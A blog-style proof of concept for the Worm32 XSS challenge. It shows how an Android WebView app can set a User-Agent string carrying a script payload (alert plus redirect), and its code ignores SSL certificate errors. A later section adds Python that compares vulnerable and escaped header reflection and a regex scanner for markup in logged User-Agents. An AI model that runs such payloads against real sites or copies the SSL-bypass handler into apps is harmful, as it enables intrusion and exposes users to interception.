UserAgent XSS using Android applications

TheTime

Posted

Worm32 recently created an XSS challenge in which you had to modify your UserAgent (UA) in order to obtain the XSS.

All fine and well when it is your own UA; there are extensions that do all the work, but the point of an XSS is to execute the script for the victims, not for yourself. Normally we do not have access to other people's UA, but there is an alternative: Android applications.

Android applications have a control called WebView, which does nothing more than load a web page or your own HTML code inside the application, somewhat similar to an iframe. It is quite rich in options and well documented, so you will not have much trouble playing with it. It also has a setting, setUserAgentString(), which lets you modify the users' UA.

As a proof of concept, I created a simple project, UAxss, with a layout that contains the WebView and a main class that contains the code.

activity_main.xml

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    android:orientation="horizontal"
    android:layout_gravity="center">

    <WebView
        android:id="@+id/webView1"
        android:layout_width="fill_parent"
        android:layout_height="fill_parent"
        android:layout_gravity="center"
        android:orientation="horizontal" />

</LinearLayout>

MainActivity.java

package com.example.uaxss;

import android.net.http.SslError;
import android.os.Bundle;
import android.app.Activity;
import android.webkit.SslErrorHandler;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.webkit.WebViewClient;

public class MainActivity extends Activity {

    WebView wb; // <-- our WebView

    private class XSSWebViewClient extends WebViewClient {
        @Override
        public boolean shouldOverrideUrlLoading(WebView view, String url) {
            return false; // let the WebView itself load every URL
        }

        @Override
        public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {
            handler.proceed(); // if any SSL error appears, we ignore it
        }
    }

    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        wb = (WebView) findViewById(R.id.webView1); // look up the WebView from our layout

        // set the UA
        wb.getSettings().setUserAgentString("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0) --> <script>var oVariabila = setTimeout( function() { alert('Guess what? IT WORKS!'); window.location = 'http://www.google.ro' ;}, 5000)</script> <!--");
        wb.getSettings().setJavaScriptEnabled(true); // so that JavaScript can run in the page

        // some extra settings
        wb.getSettings().setLoadWithOverviewMode(true);
        wb.getSettings().setUseWideViewPort(true);
        wb.getSettings().setBuiltInZoomControls(true);

        wb.setWebViewClient(new XSSWebViewClient());
        wb.setWebChromeClient(new WebChromeClient()); // needed for javascript:alert()
        wb.loadUrl("http://worm32.zz.mu/challenges/"); // start address
    }
}

And, so that the application can access the internet, we need to add the following to AndroidManifest.xml:

<uses-permission android:name="android.permission.INTERNET" /> 

As you can see, for Worm32's challenge I used the following UA, which runs an alert after 5 seconds and then redirects to google.com:

"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0) --> <script>var oVariabila = setTimeout( function() { alert('Guess what? IT WORKS!'); window.location = 'http://www.google.ro' ;}, 5000)</script> <!--"

A few images: Screenshot_2013_05_12_06_05_35.png, Screenshot_2013_05_12_06_05_40.png

Bonus: Screenshot_1.png

^ They know what they know...

Tested in the emulator on Android 4.2.2 and on a tablet with Android 4.0.4. You need Android 2.3.3+ for it to work.

Download: the Eclipse ADT project and UAxss.apk

Bonus2: another site that does not filter the UA; please note the irony...

The information presented above is purely informational. I published it so that you have a good argument in case some bug bounty program rejects such an XSS on the grounds that it is not exploitable.

Stay safe!
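From the server's side, the issue in the post is an unescaped User-Agent header reflected into HTML. The following is an added example, not code from the post or from Worm32's challenge: it shows the vulnerable reflection next to an output-encoded one, checked with the post's exact UA string, plus a small scanner over constructed Apache combined-format log lines that flags UA values carrying markup. All log entries, IP addresses and the normal UA string are constructed samples.

```python
import html
import re

# Constructed sample input: the exact User-Agent string the post's WebView sends.
UA_PAYLOAD = ("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0) "
              "--> <script>var oVariabila = setTimeout( function() { "
              "alert('Guess what? IT WORKS!'); window.location = 'http://www.google.ro' ;}, "
              "5000)</script> <!--")
# Constructed benign UA for comparison.
UA_NORMAL = "Mozilla/5.0 (Linux; Android 4.2.2) AppleWebKit/534.30 Mobile Safari/534.30"

def render_vulnerable(user_agent: str) -> str:
    """Reflects the raw header into an HTML comment; a '-->' in the header closes the comment."""
    return f"<html><body><!-- UA: {user_agent} --><p>Welcome</p></body></html>"

def render_safe(user_agent: str) -> str:
    """Encodes the header for an HTML text node: '<', '>', '&' and quotes become entities."""
    return f"<html><body><p>Your browser: {html.escape(user_agent, quote=True)}</p></body></html>"

_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

def has_script_tag(rendered_html: str) -> bool:
    """True when a live <script> tag survives in the rendered output."""
    return _SCRIPT_TAG.search(rendered_html) is not None

# Apache combined log format: the quoted User-Agent is the last field on the line.
_LOG_RE = re.compile(r'^(?P<ip>\S+) .*"(?P<ua>[^"]*)"\s*$')
# Markers that have no business in a browser identification string.
_MARKUP = re.compile(r"<[a-zA-Z!/]|-->|javascript:", re.IGNORECASE)

def suspicious_user_agents(log_lines):
    """Return (ip, user_agent) for log entries whose UA field carries HTML markup."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if m and _MARKUP.search(m.group("ua")):
            hits.append((m.group("ip"), m.group("ua")))
    return hits

# Constructed access-log lines for a quick self-check.
SAMPLE_LOG = [
    f'203.0.113.7 - - [12/May/2013:06:05:35 +0000] "GET /challenges/ HTTP/1.1" 200 512 "-" "{UA_NORMAL}"',
    f'203.0.113.9 - - [12/May/2013:06:05:40 +0000] "GET /challenges/ HTTP/1.1" 200 512 "-" "{UA_PAYLOAD}"',
]

if __name__ == "__main__":
    print(has_script_tag(render_vulnerable(UA_PAYLOAD)), has_script_tag(render_safe(UA_PAYLOAD)))
    print(suspicious_user_agents(SAMPLE_LOG))
```

Note that html.escape does not touch the "-->" sequence, so reflecting even an escaped header inside an HTML comment still lets the attacker close the comment; reflect into a text node, as render_safe does, not into a comment.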
